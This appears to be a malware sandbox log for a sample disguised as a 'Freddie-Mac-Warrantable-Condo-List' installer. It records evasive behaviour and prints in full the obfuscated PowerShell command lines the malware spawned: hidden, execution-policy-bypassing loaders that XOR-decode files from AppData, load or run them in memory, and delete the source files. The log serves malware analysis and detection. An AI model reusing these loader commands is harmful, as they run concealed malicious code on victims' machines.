Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4215	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4107	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 446	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8484
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8447
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8497
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2883
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2279
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3102
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 384
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 1566
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2202
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 1651
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2418
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 394
Source: C:\Windows\System32\conhost.exe	Window / User API: threadDelayed 1782
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5838
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 398

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_5-20152

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe

Code function: 1_2_004AF91C GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,

1_2_004AF91C

Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_0040AEF4 FindFirstFileW,FindClose,	1_2_0040AEF4
Source: C:\Users\user\Desktop\Freddie-Mac-Warrantable-Condo-List.exe	Code function: 1_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	1_2_0040A928
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_0060C2B0 FindFirstFileW,GetLastError,	5_2_0060C2B0
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_0040E6A0 FindFirstFileW,FindClose,	5_2_0040E6A0
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	5_2_0040E0D4
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Code function: 5_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,	5_2_006B8DE4

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 32653
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 30856
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 31266
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 30580
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 38123
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 35172
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 31929
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 35459
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 37981
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 31267
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 36331
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 30444
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 37323
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Source: powershell.exe, 0000000B.00000002.433182150.00000000056F5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: powershell.exe, 0000000B.00000002.409330943.000000000515F000.00000004.00000001.sdmp	Binary or memory string: i:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

Yara detected Powershell dedcode and execute

Show sources

Source: Yara match	File source: C:\Users\user\Documents\20210828\PowerShell_transcript.179605.RDwWASt6.20210828000501.txt, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\20210828\PowerShell_transcript.179605.n4qSLmb6.20210828000459.txt, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\20210828\PowerShell_transcript.179605.OHVMY+dj.20210828000500.txt, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\20210828\PowerShell_transcript.179605.gRShAM7L.20210828000505.txt, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\20210828\PowerShell_transcript.179605.+ee_YVKB.20210828000458.txt, type: DROPPED
Source: Yara match	File source: C:\Users\user\Documents\20210828\PowerShell_transcript.179605.atyuF1G2.20210828000500.txt, type: DROPPED

Bypasses PowerShell execution policy

Show sources

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'PowerShell.exe' -WiNDOwstylE HIddeN -Ep BYPAsS -cOMMaNd '$ac4e9891fa848c834b332582d5737='PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6diNheTd2JW0xYXg0UUFQdCl9eVp4U1I4Pm94U3NwcjtQRUN5b205I3lTTVBJeHxRO1Zza3JqMGZ9UWZRc2V0Z0l1IUd7OHp4MFd6cXd8ZnJrcEB8flpJQFNlNChAcmpefkByYXFCQHU8MHZAYGthNkBUN15vQHZWKWleMWgjJkBUIXhyQFVEVEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/';$aa72f1a1fc04ca9b1e4f38c4d6a44=[sYsteM.io.FiLE]::ReAdaLlBYTes('C:\Users\user\AppData\Roaming\MicRoSoFt\AzaONdljHpEnf\ISqTifyHJbs.KnRFhVuafP');fOR($a6eb59278704fda8e348cbb9154ed=0;$a6eb59278704fda8e348cbb9154ed -Lt $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt;){FOr($afdf6f52050420a0ab96054f3fd1c=0;$afdf6f52050420a0ab96054f3fd1c -lT $ac4e9891fa848c834b332582d5737.LengtH;$afdf6f52050420a0ab96054f3fd1c++){$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed]=$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed] -BxOR $ac4e9891fa848c834b332582d5737[$afdf6f52050420a0ab96054f3fd1c];$a6eb59278704fda8e348cbb9154ed++;if($a6eb59278704fda8e348cbb9154ed -GE $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt){$afdf6f52050420a0ab96054f3fd1c=$ac4e9891fa848c834b332582d5737.LeNGTh}}};[SYstem.RefLECtIon.ASseMblY]::LOAD($aa72f1a1fc04ca9b1e4f38c4d6a44);[MArS.dEimOs]::inTErACT()'

Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'PowerShell.exe' -WiNDOwstylE HIddeN -Ep BYPAsS -cOMMaNd '$ac4e9891fa848c834b332582d5737='PEdaTnlwcVotaXFyUV55cWxTVTxzK3FqO299cyR4cFFyTVdvMGptWmtGKWN6diNheTd2JW0xYXg0UUFQdCl9eVp4U1I4Pm94U3NwcjtQRUN5b205I3lTTVBJeHxRO1Zza3JqMGZ9UWZRc2V0Z0l1IUd7OHp4MFd6cXd8ZnJrcEB8flpJQFNlNChAcmpefkByYXFCQHU8MHZAYGthNkBUN15vQHZWKWleMWgjJkBUIXhyQFVEVEdAYGF3Z0BSb358QGBKZ09Ae0VDfl4xaXV8QF8/cF9eT0NIeEB1PDY/';$aa72f1a1fc04ca9b1e4f38c4d6a44=[sYsteM.io.FiLE]::ReAdaLlBYTes('C:\Users\user\AppData\Roaming\MicRoSoFt\AzaONdljHpEnf\ISqTifyHJbs.KnRFhVuafP');fOR($a6eb59278704fda8e348cbb9154ed=0;$a6eb59278704fda8e348cbb9154ed -Lt $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt;){FOr($afdf6f52050420a0ab96054f3fd1c=0;$afdf6f52050420a0ab96054f3fd1c -lT $ac4e9891fa848c834b332582d5737.LengtH;$afdf6f52050420a0ab96054f3fd1c++){$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed]=$aa72f1a1fc04ca9b1e4f38c4d6a44[$a6eb59278704fda8e348cbb9154ed] -BxOR $ac4e9891fa848c834b332582d5737[$afdf6f52050420a0ab96054f3fd1c];$a6eb59278704fda8e348cbb9154ed++;if($a6eb59278704fda8e348cbb9154ed -GE $aa72f1a1fc04ca9b1e4f38c4d6a44.CoUnt){$afdf6f52050420a0ab96054f3fd1c=$ac4e9891fa848c834b332582d5737.LeNGTh}}};[SYstem.RefLECtIon.ASseMblY]::LOAD($aa72f1a1fc04ca9b1e4f38c4d6a44);[MArS.dEimOs]::inTErACT()'
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-QP5KN.tmp\Freddie-Mac-Warrantable-Condo-List.tmp	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -command '$c239f13f4fca76f767f4d6fba51f5357='C:\Users\user\ff16164fb7c4dafe1c7dfcf35f3026a6\d2be156f565f9a33407d3b35652b2e6b\ac6140bddaefd4184a2ac9147b8ab988\23f208d5d228a6c8868973e2a59eb750\499c75f14902898da0887c7e00c52a39\7c17c4d25461b0a8b70ac7df296a5b1d\135890c6321e74eb48d13dc7dca30610';$b25f80f9b8486adec377044555c08d58='LQkjiTRCEptIqeJsNVbaHOSKWruPBAGdxYgDUzlXvhwnZcfoFMym';$0f62f3d786a88cbe7974da6f25a19b74=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($c239f13f4fca76f767f4d6fba51f5357));remove-item $c239f13f4fca76f767f4d6fba51f5357;for($i=0;$i -lt $0f62f3d786a88cbe7974da6f25a19b74.count;){for($j=0;$j -lt $b25f80f9b8486adec377044555c08d58.length;$j++){$0f62f3d786a88cbe7974da6f25a19b74[$i]=$0f62f3d786a88cbe7974da6f25a19b74[$i] -bxor $b25f80f9b8486adec377044555c08d58[$j];$i++;if($i -ge $0f62f3d786a88cbe7974da6f25a19b74.count){$j=$b25f80f9b8486adec377044555c08d58.length}}};$0f62f3d786a88cbe7974da6f25a19b74=[System.Text.Encoding]::UTF8.GetString($0f62f3d786a88cbe7974da6f25a19b74);iex $0f62f3d786a88cbe7974da6f25a19b74;'	Jump to behavior
